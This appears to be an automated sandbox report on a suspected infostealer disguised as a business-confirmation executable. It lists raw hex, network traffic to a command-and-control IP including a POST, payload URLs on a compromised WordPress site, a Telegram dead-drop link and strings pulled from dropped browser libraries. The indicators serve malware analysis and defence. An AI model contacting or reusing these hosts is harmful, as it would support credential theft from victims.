fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51 dd 08 20 8e a8

Source: global traffic	HTTP traffic detected: GET //l/f/7y4Wg3gBuI_ccNKoGwkK/0a3546e5040ab5a4b3cac44b064a321d51adba4a HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 45.139.236.6
Source: global traffic	HTTP traffic detected: GET //l/f/7y4Wg3gBuI_ccNKoGwkK/7a6d75ef6f646f4419fc28f58e62a7952e597921 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 45.139.236.6

Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.837471226.00000000009E7000.00000004.00000001.sdmp	String found in binary or memory: rence":"http://support.apple.com/kb/HT203092","status":"requires_authorization","version":"7.7.6"}]},"chromium-pdf":{"group_name_matcher":"Chromium PDF Viewer","mime_types":[],"name":"Chromium PDF Viewer","versions":[{"comment":"Chromium PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"chromium-pdf-plugin":{"group_name_matcher":"Chromium PDF Plugin","mime_types":[],"name":"Chromium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"DivX Web Player","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"Facebook Video","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"Chrome PDF Viewer","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"Chrome PDF Plugin","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"Google Earth","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"Google Talk","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"IBMJava*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","applicati
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.837471226.00000000009E7000.00000004.00000001.sdmp	String found in binary or memory: rence":"http://support.apple.com/kb/HT203092","status":"requires_authorization","version":"7.7.6"}]},"chromium-pdf":{"group_name_matcher":"Chromium PDF Viewer","mime_types":[],"name":"Chromium PDF Viewer","versions":[{"comment":"Chromium PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"chromium-pdf-plugin":{"group_name_matcher":"Chromium PDF Plugin","mime_types":[],"name":"Chromium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"DivX Web Player","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"Facebook Video","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"Chrome PDF Viewer","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"Chrome PDF Plugin","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"Google Earth","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"Google Talk","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"IBMJava*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","applicati

Source: unknown

DNS traffic detected: queries for: ekocafebali.com

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 45.139.236.6

Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.849907601.00000000009A8000.00000004.00000020.sdmp	String found in binary or memory: http://45.139.236.6
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	String found in binary or memory: http://45.139.236.6/
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.849907601.00000000009A8000.00000004.00000020.sdmp	String found in binary or memory: http://45.139.236.6//l/f/7y4Wg3gBuI_ccNKoGwkK/0a3546e5040ab5a4b3cac44b064a321d51adba4a
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.849907601.00000000009A8000.00000004.00000020.sdmp	String found in binary or memory: http://45.139.236.6//l/f/7y4Wg3gBuI_ccNKoGwkK/7a6d75ef6f646f4419fc28f58e62a7952e597921
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.849907601.00000000009A8000.00000004.00000020.sdmp	String found in binary or memory: http://45.139.236.6//l/f/7y4Wg3gBuI_ccNKoGwkK/7a6d75ef6f646f4419fc28f58e62a7952e597921er
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.849907601.00000000009A8000.00000004.00000020.sdmp	String found in binary or memory: http://45.139.236.6/E
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839118709.0000000000A12000.00000004.00000001.sdmp	String found in binary or memory: http://45.139.236.6/OINT
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.830914273.00000000009F9000.00000004.00000001.sdmp	String found in binary or memory: http://45.139.236.6/q_
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.849907601.00000000009A8000.00000004.00000020.sdmp	String found in binary or memory: http://45.139.236.6ne
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.830914273.00000000009F9000.00000004.00000001.sdmp	String found in binary or memory: http://apps.identrust.com/roots/dst
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839106229.00000000009FA000.00000004.00000001.sdmp	String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp, AccessibleHandler.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp, AccessibleHandler.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: nssckbi.dll.4.dr	String found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: nssckbi.dll.4.dr	String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.830914273.00000000009F9000.00000004.00000001.sdmp	String found in binary or memory: http://cps.letseh
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839106229.00000000009FA000.00000004.00000001.sdmp	String found in binary or memory: http://cps.letsencrypt.org0
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839106229.00000000009FA000.00000004.00000001.sdmp	String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: nssckbi.dll.4.dr	String found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
Source: nssckbi.dll.4.dr	String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: nssckbi.dll.4.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: nssckbi.dll.4.dr	String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
Source: nssckbi.dll.4.dr	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839106229.00000000009FA000.00000004.00000001.sdmp	String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: nssckbi.dll.4.dr	String found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
Source: nssckbi.dll.4.dr	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: nssckbi.dll.4.dr	String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: nssckbi.dll.4.dr	String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp, AccessibleHandler.dll.4.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: nssckbi.dll.4.dr	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp, AccessibleHandler.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp, AccessibleHandler.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp, AccessibleHandler.dll.4.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp, AccessibleHandler.dll.4.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.837471226.00000000009E7000.00000004.00000001.sdmp	String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
Source: nssckbi.dll.4.dr	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: nssckbi.dll.4.dr	String found in binary or memory: http://ocsp.accv.es0
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp, AccessibleHandler.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp, AccessibleHandler.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp, AccessibleHandler.dll.4.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: nssckbi.dll.4.dr	String found in binary or memory: http://policy.camerfirma.com0
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.849907601.00000000009A8000.00000004.00000020.sdmp	String found in binary or memory: http://r3.i.lencr.org/0-
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839106229.00000000009FA000.00000004.00000001.sdmp	String found in binary or memory: http://r3.i.lencr.org/0Y
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839106229.00000000009FA000.00000004.00000001.sdmp	String found in binary or memory: http://r3.o.lencr.org0
Source: nssckbi.dll.4.dr	String found in binary or memory: http://repository.swisssign.com/0
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839087627.0000000000A34000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.837471226.00000000009E7000.00000004.00000001.sdmp	String found in binary or memory: http://support.apple.com/kb/HT203092
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp, AccessibleHandler.dll.4.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp, AccessibleHandler.dll.4.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp, AccessibleHandler.dll.4.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: nssckbi.dll.4.dr	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: nssckbi.dll.4.dr	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
Source: nssckbi.dll.4.dr	String found in binary or memory: http://www.accv.es/legislacion_c.htm0U
Source: nssckbi.dll.4.dr	String found in binary or memory: http://www.accv.es00
Source: nssckbi.dll.4.dr	String found in binary or memory: http://www.cert.fnmt.es/dpcs/0
Source: nssckbi.dll.4.dr	String found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: nssckbi.dll.4.dr	String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: nssckbi.dll.4.dr	String found in binary or memory: http://www.chambersign.org1
Source: nssckbi.dll.4.dr	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: nssckbi.dll.4.dr	String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: mozglue.dll.4.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp, AccessibleHandler.dll.4.dr	String found in binary or memory: http://www.mozilla.com0
Source: nssckbi.dll.4.dr	String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
Source: nssckbi.dll.4.dr	String found in binary or memory: http://www.quovadis.bm0
Source: nssckbi.dll.4.dr	String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: sqlite3.dll.4.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: nssckbi.dll.4.dr	String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839087627.0000000000A34000.00000004.00000001.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;g
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.849907601.00000000009A8000.00000004.00000020.sdmp, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839087627.0000000000A34000.00000004.00000001.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094
Source: RYwTiizs2t.4.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839087627.0000000000A34000.00000004.00000001.sdmp	String found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9
Source: RYwTiizs2t.4.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839128579.0000000000A18000.00000004.00000001.sdmp	String found in binary or memory: https://consent.google.com/?hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.846081146.00000000009EC000.00000004.00000001.sdmp, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839087627.0000000000A34000.00000004.00000001.sdmp	String found in binary or memory: https://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.go
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	String found in binary or memory: https://consent.google.com/set?pc=s&uxe=4421591
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839087627.0000000000A34000.00000004.00000001.sdmp	String found in binary or memory: https://consent.google.com/set?pc=s&uxe=4421591LMEM
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839087627.0000000000A34000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.846017240.0000000000A22000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1xdLMEM
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839118709.0000000000A12000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.846017240.0000000000A22000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1e-LMEM
Source: RYwTiizs2t.4.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RYwTiizs2t.4.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RYwTiizs2t.4.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.849718672.0000000000561000.00000040.00000001.sdmp	String found in binary or memory: https://ekocafebali.com/wp-content/plugins/vmaxyvefms/back/78893c675eddafbfbda146801a998645182ce2c3_
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.849718672.0000000000561000.00000040.00000001.sdmp	String found in binary or memory: https://ekocafebali.com/wp-content/plugins/vmaxyvefms/main/78893c675eddafbfbda146801a998645182ce2c3_
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839106229.00000000009FA000.00000004.00000001.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839118709.0000000000A12000.00000004.00000001.sdmp	String found in binary or memory: https://helpx.a
Source: nssckbi.dll.4.dr	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: nssckbi.dll.4.dr	String found in binary or memory: https://repository.luxtrust.lu0
Source: RYwTiizs2t.4.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: RYwTiizs2t.4.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839118709.0000000000A12000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.c
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.837471226.00000000009E7000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.837414207.0000000000A22000.00000004.00000001.sdmp, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.837391480.0000000000A12000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.837414207.0000000000A22000.00000004.00000001.sdmp, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.837391480.0000000000A12000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839106229.00000000009FA000.00000004.00000001.sdmp	String found in binary or memory: https://telete.in/org/img/t_logo.png
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839106229.00000000009FA000.00000004.00000001.sdmp	String found in binary or memory: https://telete.in/yoyodcabane
Source: nssckbi.dll.4.dr	String found in binary or memory: https://www.catcert.net/verarrel
Source: nssckbi.dll.4.dr	String found in binary or memory: https://www.catcert.net/verarrel05
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp, AccessibleHandler.dll.4.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839106229.00000000009FA000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839087627.0000000000A34000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.pngx%
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839087627.0000000000A34000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/favicon.ico
Source: RYwTiizs2t.4.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839106229.00000000009FA000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839106229.00000000009FA000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/search?source=hp&ei=djJ0X6TKCL6IjLsPqriogAY&q=chrome&oq=chrome&gs_lcp=CgZwc3k
